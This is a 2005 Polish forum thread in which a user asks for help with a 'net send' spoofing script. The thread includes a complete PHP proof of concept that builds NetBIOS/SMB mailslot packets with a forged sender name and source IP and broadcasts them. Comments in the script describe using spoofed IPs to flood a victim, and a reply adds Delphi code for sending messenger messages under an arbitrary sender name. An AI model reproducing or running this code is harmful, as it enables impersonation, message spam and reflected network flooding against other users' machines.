net send spoofing

oetalog · Grudzień 4, 2005

Jak zrobić net send spoofing?? mam taki sprypt tylko coś nie chodzi :/
Chodzi mi oto żeby w polu od pisało nie mója nazwa użytkownika tylko inna

Może mi ktoś powiedzieć oco chodzi w tym sprypcie bo coś nie chodzi :/

//Questo proof-of-concept che equivale al comando [1] invia un pacchetto broadcast
//a tutti i computer di una lan sulla porta udp 138, come legittimamente ci si
//aspetterebbe. Modificando la variabile $data e conseguentemente la variabile
//$datagramlength č possibile spoofare il mittente del messaggio.
//Modificando l'ip č possibile valicare i limiti di una lan.

<?php

// rgod NET SEND
// proof-of-concept net send spoofing

// utile funzione di encoding per i netbios names
function myencoder($stringa)
{
$enc='';
for ($crttr=0; $crttr<=(strlen($stringa)-1); $crttr++)
{
switch ($stringa[$crttr])
{
case 'A': $enc.='EB'; break;
case 'B': $enc.='EC'; break;
case 'C': $enc.='ED'; break;
case 'D': $enc.='EE'; break;
case 'E': $enc.='EF'; break;
case 'F': $enc.='EG'; break;
case 'G': $enc.='EH'; break;
case 'H': $enc.='EI'; break;
case 'I': $enc.='EJ'; break;
case 'J': $enc.='EK'; break;
case 'K': $enc.='EL'; break;
case 'L': $enc.='EM'; break;
case 'M': $enc.='EN'; break;
case 'N': $enc.='EO'; break;
case 'O': $enc.='EP'; break;
case 'P': $enc.='FA'; break;
case 'Q': $enc.='FB'; break;
case 'R': $enc.='FC'; break;
case 'S': $enc.='FD'; break;
case 'T': $enc.='FE'; break;
case 'U': $enc.='FF'; break;
case 'V': $enc.='FG'; break;
case 'W': $enc.='FH'; break;
case 'X': $enc.='FI'; break;
case 'Y': $enc.='FJ'; break;
case 'Z': $enc.='FK'; break;
case '0': $enc.='DA'; break;
case '1': $enc.='DB'; break;
case '2': $enc.='DC'; break;
case '3': $enc.='DD'; break;
case '4': $enc.='DE'; break;
case '5': $enc.='DF'; break;
case '6': $enc.='DG'; break;
case '7': $enc.='DH'; break;
case '8': $enc.='DI'; break;
case '9': $enc.='DJ'; break;
case ' ': $enc.='CA'; break;
case '!': $enc.='CB'; break;
case '"': $enc.='CC'; break;
case '#': $enc.='CD'; break;
case '$': $enc.='CE'; break;
case '%': $enc.='CF'; break;
case '&': $enc.='CG'; break;
case "'": $enc.='CH'; break;
case '(': $enc.='CI'; break;
case ')': $enc.='CJ'; break;
case '*': $enc.='CK'; break;
case '+': $enc.='CL'; break;
case ',': $enc.='CM'; break;
case '-': $enc.='CN'; break;
case '.': $enc.='CO'; break;
case '=': $enc.='DN'; break;
case ':': $enc.='DK'; break;
case ';': $enc.='DL'; break;
case '@': $enc.='EA'; break;
case '^': $enc.='FO'; break;
case '_': $enc.='FP'; break;
case '{': $enc.='HL'; break;
case '}': $enc.='HN'; break;
case '~': $enc.='HO'; break;
}
}
do {$enc.='CA';}
while (strlen($enc)<>30);
$enc.='AA';
return $enc;
}

// costruisco il pacchetto

//[1] Netbios datagram service
$messagetype=chr(0x11);
$morefragments=chr(0x02); //no
$datagramid=chr(0x81).chr(0x33);
$sourceip=chr(0x52).chr(0x31).chr(0x36).chr(0x63); //82.49.54.99
$sourceport=chr(0x00).chr(0x8a); //138
$datagramlength=chr(0x00).chr(0xa8);
$packetoffset=chr(0x00).chr(0x00);
$sourcename=chr(0x20).myencoder('CILA').chr(0x00);
$destinationname=chr(0x20).myencoder('WORKGROUP').chr(0x00);

$firstblock=$messagetype.$morefragments.$datagramid.$sourceip.$sourceport.
$datagramlength.$packetoffset.$sourcename.$destinationname;

//[2] SMB Server Message Block Protocol
$servercomponent=chr(0xff).chr(0x53).chr(0x4d).chr(0x42); //SMB
$smbcommand=chr(0x25); //Trans
$errorclass=chr(0x00); //success
$reserved=chr(0x00);
$errorcode=chr(0x00).chr(0x00); //no error
$flags=chr(0x18);
$flagsii=chr(0x04).chr(0x00);
$processid=chr(0x00).chr(0x00);
$signature=chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00);
$reservedii=chr(0x00).chr(0x00);
$treeid=chr(0x00).chr(0x00);
$processidii=chr(0xff).chr(0xfe);
$useridii=chr(0x00).chr(0x00);
$multiplexid=chr(0x00).chr(0x00);
$wordcount=chr(0x11);
$totalparametercount=chr(0x00).chr(0x00);
$totaldatacount=chr(0x0c).chr(0x00);
$maxparametercount=chr(0x02).chr(0x00);
$maxdatacount=chr(0x00).chr(0x00);
$maxsetupcount=chr(0x00);
$reservediii=chr(0x00);
$flagsiii=chr(0x02).chr(0x00);
$timeout=chr(0x00).chr(0x00).chr(0x00).chr(0x00);
$reservediv=chr(0x00).chr(0x00);
$parametercount=chr(0x00).chr(0x00);
$parameteroffset=chr(0x58).chr(0x00);
$datacount=chr(0x0c).chr(0x00);
$dataoffset=chr(0x58).chr(0x00);
$setupcount=chr(0x03);
$reservedv=chr(0x00);
$opcode=chr(0x01).chr(0x00);
$priority=chr(0x00).chr(0x00);
$class=chr(0x02).chr(0x0);
$bytecount=chr(0x1f).chr(0x00);
$transactionname='MAILSLOTmessngr'.chr(0x00);
$padding=chr(0x05);

$data='HCKR'.chr(0x00).'*'.chr(0x00).'ciao'.chr(0x00);

$secondblock=$servercomponent.$smbcommand.$errorclass.$reserved.
$errorcode.$flags.$flagsii.$processid.$signature.$reservedii.
$treeid.$processidii.$useridii.$multiplexid.$wordcount.$totalparametercount.
$totaldatacount.$maxparametercount.$maxdatacount.$maxsetupcount.
$reservediii.$flagsiii.$timeout.$reservediv.$parametercount.
$parameteroffset.$datacount.$dataoffset.$setupcount.$reservedv.
$opcode.$priority.$class.
$bytecount.$transactionname.$padding.$data;

// riassemblo il pacchetto
$mypacket=$firstblock.$secondblock;

$ip='255.255.255.255';
$fp=fsockopen('udp://'.$ip, 138);
fputs($fp, $mypacket);
fclose($fp);

?>

// L'attenzione degli spammer si č spostata su tutte le porte udp, in
// particolare sulla porta 135
// Ho sniffato con Ethereal uno di questi pacchetti...

// 04 00 08 00 10 00 00 00 00 00 00 00 00 00 ........ ........
//0040 00 00 00 00 00 00 00 00 00 00 f8 91 7b 5a 00 ff ........ ....{Z..
//0050 d0 11 a9 b2 00 c0 4f b6 e6 fc 33 d7 5a d8 08 7e ......O. ..3.Z..~
//0060 a9 40 bc 96 4e d0 b1 59 f3 d7 f1 07 a9 41 01 00 [email protected] .....A..
//0070 00 00 0e 00 00 00 00 00 ff ff 78 00 32 03 00 00 ........ ..x.2...
//0080 00 00 0a 00 00 00 00 00 00 00 0a 00 00 00 4d 49 ........ ......MI
//0090 43 52 4f 53 4f 46 54 00 00 00 0c 00 00 00 00 00 CROSOFT. ........
//00a0 00 00 0c 00 00 00 38 32 2e 34 39 2e 35 34 2e 37 ......82 .49.54.7
//00b0 38 00 f6 02 00 00 00 00 00 00 f6 02 00 00 4d 69 8....... ......Mi
//00c0 63 72 6f 73 6f 66 74 20 53 65 63 75 72 69 74 79 crosoft Security
//00d0 20 55 70 64 61 74 65 20 4d 53 30 33 2d 30 34 33 Update MS03-043
//00e0 3a 20 41 75 67 75 73 74 20 32 37 2c 20 32 30 30 : August 27, 200
//00f0 34 0d 0a 0d 0a 46 72 6f 6d 20 4d 69 63 72 6f 73 4....Fro m Micros
//0100 6f 66 74 27 73 20 54 65 63 68 4e 65 74 20 77 65 oft's Te chNet we
//0110 62 73 69 74 65 3a 20 22 41 20 73 65 63 75 72 69 bsite: " A securi
//0120 74 79 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 79 ty vulne rability
//0130 20 65 78 69 73 74 73 20 69 6e 20 74 68 65 20 4d exists in the M
//0140 65 73 73 65 6e 67 65 72 20 53 65 72 76 69 63 65 essenger Service
//0150 20 74 68 61 74 20 63 6f 75 6c 64 20 0d 0a 61 6c that co uld ..al
//0160 6c 6f 77 20 61 72 62 69 74 72 61 72 79 20 63 6f low arbi trary co
//0170 64 65 20 65 78 65 63 75 74 69 6f 6e 20 6f 6e 20 de execu tion on
//0180 61 6e 20 61 66 66 65 63 74 65 64 20 73 79 73 74 an affec ted syst
//0190 65 6d 2e 20 41 6e 20 61 74 74 61 63 6b 65 72 20 em. An a ttacker
//01a0 77 68 6f 20 73 75 63 63 65 73 73 66 75 6c 6c 79 who succ essfully
//01b0 20 65 78 70 6c 6f 69 74 65 64 20 74 68 69 73 20 exploit ed this
//01c0 0d 0a 76 75 6c 6e 65 72 61 62 69 6c 69 74 79 20 ..vulner ability
//01d0 63 6f 75 6c 64 20 62 65 20 61 62 6c 65 20 74 6f could be able to
//01e0 20 72 75 6e 20 63 6f 64 65 20 77 69 74 68 20 4c run cod e with L
//01f0 6f 63 61 6c 20 53 79 73 74 65 6d 20 70 72 69 76 ocal Sys tem priv
//0200 69 6c 65 67 65 73 20 6f 6e 20 61 6e 20 61 66 66 ileges o n an aff
//0210 65 63 74 65 64 20 73 79 73 74 65 6d 2e 20 54 68 ected sy stem. Th
//0220 65 20 61 74 74 61 63 6b 65 72 20 0d 0a 63 6f 75 e attack er ..cou
//0230 6c 64 20 74 68 65 6e 20 74 61 6b 65 20 61 6e 79 ld then take any
//0240 20 61 63 74 69 6f 6e 20 6f 6e 20 74 68 65 20 73 action on the s
//0250 79 73 74 65 6d 2c 20 69 6e 63 6c 75 64 69 6e 67 ystem, i ncluding
//0260 20 69 6e 73 74 61 6c 6c 69 6e 67 20 70 72 6f 67 install ing prog
//0270 72 61 6d 73 2c 20 76 69 65 77 69 6e 67 2c 20 63 rams, vi ewing, c
//0280 68 61 6e 67 69 6e 67 20 6f 72 20 64 65 6c 65 74 hanging or delet
//0290 69 6e 67 20 0d 0a 64 61 74 61 2c 20 6f 72 20 63 ing ..da ta, or c
//02a0 72 65 61 74 69 6e 67 20 6e 65 77 20 61 63 63 6f reating new acco
//02b0 75 6e 74 73 20 77 69 74 68 20 66 75 6c 6c 20 70 unts wit h full p
//02c0 72 69 76 69 6c 65 67 65 73 2e 22 0d 0a 0d 0a 54 rivilege s."....T
//02d0 6f 20 73 65 63 75 72 65 20 61 6c 6c 20 76 75 6c o secure all vul
//02e0 6e 65 72 61 62 69 6c 69 74 69 65 73 20 77 69 74 nerabili ties wit
//02f0 68 20 74 68 65 20 4d 65 73 73 65 6e 67 65 72 20 h the Me ssenger
//0300 53 65 72 76 69 63 65 20 70 6c 65 61 73 65 20 76 Service please v
//0310 69 73 69 74 20 77 77 77 2e 53 74 6f 70 4d 65 73 isit www .StopMes
//0320 73 65 6e 67 65 72 41 64 73 2e 63 6f 6d 0d 0a 0d sengerAd s.com...
//0330 0a 43 6c 69 63 6b 69 6e 67 20 4f 4b 20 77 69 6c .Clickin g OK wil
//0340 6c 20 6e 6f 74 20 74 61 6b 65 20 79 6f 75 20 74 l not ta ke you t
//0350 6f 20 74 68 65 20 77 65 62 73 69 74 65 2e 20 50 o the we bsite. P
//0360 6c 65 61 73 65 20 76 69 73 69 74 20 74 68 65 20 lease vi sit the
//0370 77 65 62 73 69 74 65 20 62 65 66 6f 72 65 20 63 website before c
//0380 6c 69 63 6b 69 6e 67 20 4f 4b 2e 0d 0a 0d 0a 2a licking OK.....*
//0390 2a 2a 2a 20 77 77 77 2e 53 74 6f 70 4d 65 73 73 *** www. StopMess
//03a0 65 6e 67 65 72 41 64 73 2e 63 6f 6d 20 2a 2a 2a engerAds .com ***
//03b0 2a 0d 0a 00 *...

//... che riesce a strappare un sorriso ironico.
//Questo tipo di spam frammentata sulle porte udp offre la possibilitŕ di un
//altro tipo di attacco. Spoofando l'ip, il proprietario del vero ip si troverŕ
//la rete congestionata da replies o pacchetti ICMP ECHO unreachable

//rgod

goliat · Grudzień 4, 2005

check this out:

Kod:

function myNetSend(sender,receiver,message : string):boolean;

var data     : array [1..1024] of char;

    strSlot  : string;

    hSlot    : THandle;

    bWritten : DWORD;

    dwLength : DWORD;

begin

  result:=FALSE;

  CopyMemory(@data[1],Pchar(sender),length(sender));

  dwLength:=length(sender);

  Inc(dwLength);  

  data[dwLength]:=#0;

  CopyMemory(@data[dwLength+1],Pchar(receiver),length(receiver));

  Inc(dwLength,length(receiver)+1);

  data[dwLength]:=#0;

  CopyMemory(@data[dwLength+1],Pchar(message),length(message));

  Inc(dwLength,length(message)+1);

  data[dwLength]:=#0;

  strSlot:=Pchar(receiver)+'MAILSLOTmessngr';



  hSlot:=CreateFile(Pchar(strSlot),GENERIC_WRITE, {FILE_SHARE_READ}0, nil,

    OPEN_EXISTING, 0, 0);



  if hSlot<>0 then begin

     result:=WriteFile(hSlot,data,dwLength,bWritten,nil)=TRUE;

     CloseHandle(hSlot);

     end;

end;

messenger korzysta z mechnizmu mailslot. sa jeszcze inna programowe metody obslugi net senda. implementacyjnie w warstwie wyzszej.
kod z czasow kiedy jeszcze cos pisalem w Delphi.

podobno jest na tej stronie jest gdzies przycisk "pomogl" ? nie moge znalezc :mrgreen:

_MaVeR_ · Grudzień 4, 2005

ten przycisk jest widoczny tylko dla zalozyciela tematu

goliat · Grudzień 4, 2005

ten przycisk jest widoczny tylko dla zalozyciela tematu[/b]

wiesz Maver zdaje sobie z tego sprawe, zdradze Ci wielką tajemnice, ten tekst to byla taka mala insynuacja

powaga 8)
swoją drogą dobrze, ze na forum jest tylu chętych do pomocy, tak trzymaj

oetalog · Grudzień 4, 2005

wszystko OK :/

Ale prosze CPP :/

net send spoofing

oetalog

Użytkownik

goliat

Użytkownik

_MaVeR_

Użytkownik

goliat

Użytkownik

oetalog

Użytkownik